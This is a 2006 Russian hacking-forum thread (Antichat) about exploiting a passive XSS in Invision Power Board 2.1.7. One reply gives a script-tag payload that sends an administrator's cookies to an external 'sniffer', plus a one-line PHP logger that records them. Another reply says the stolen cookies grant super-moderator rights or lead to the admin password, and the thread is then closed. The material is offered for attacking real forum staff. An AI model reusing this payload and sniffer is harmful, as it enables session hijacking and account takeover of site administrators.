Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Xss в Ipb 2.1.7 (https://forum.antichat.xyz/showthread.php?t=24043)

Fr-Ron 15.09.2006 21:41

Xss в Ipb 2.1.7
 
Давайте поподробнее поговорим об пассивном Xss в Ibp 2.1.7.
Предупреждаю - опыта у меня ой как мало и понимаю маловато, поэтому и пришел сюда.
Фичу с внедрением алерта в заголовок ЛС я усвоил. Но мелькало что-то про модеров... чего там можно добиться? И до чего вобще можно дойти, используя этот Xss?
Только с описанием поподробней плз.

LoFFi 15.09.2006 21:55

XSS - Cross Site Scripting

Данная бага позволяет тебе украсть куки. Требуется чтоб админ глянул эту страничку с XSS скриптом - ты получишь куки, которые тебе обеспечат доступ. Для того чтобы получить куки тебе понадобится сниффер - скрипт который приймет сигнал от XSS скрипта и запишет куки.

XSS скрипт:
Код:

<script>img = new Image(); img.src='_PATH_';</script>
Где _PATH_ - путь к снифферу. Я лично юзаю свой сниффер. Можешь юзать например ачатовский.

Пример XSS + sniff

Код:

<script>img = new Image(); img.src='_PATH_';</script>
sniff
Код:

<? fputs(fopen("log.txt","a+"),$_SERVER['QUERY_STRING']);
?>


Fr-Ron 15.09.2006 22:00

Хм, админ должен заглянуть на страничку с Xss... Т.е. в случае с ИБП он должен просто отурыть мое ЛС, в заголовке которого и будет Xss?

И вопрос наперед - когда я получу куки, что надо будет сделать для их расшифровки, дабы получить пароль? Просто залогиниться не устраивает =(

Azazel 15.09.2006 22:04

Используя XSS ты можешь получить права супермодера. Об этом говорили подробно много раз.
Я не считаю нужным оставлять тему открытой ибо, либо куки с xss = супермодер, либо инфа с базы и => пасс админа.

Закрыто.

ПС: Я пожалуй предупрежу: Если ты маловато знаешь - попробуй узнать больше своими силами, тут тебе не faq.

Azazel 15.09.2006 22:07

Юзай поиск. Все ответы есть.


Время: 04:09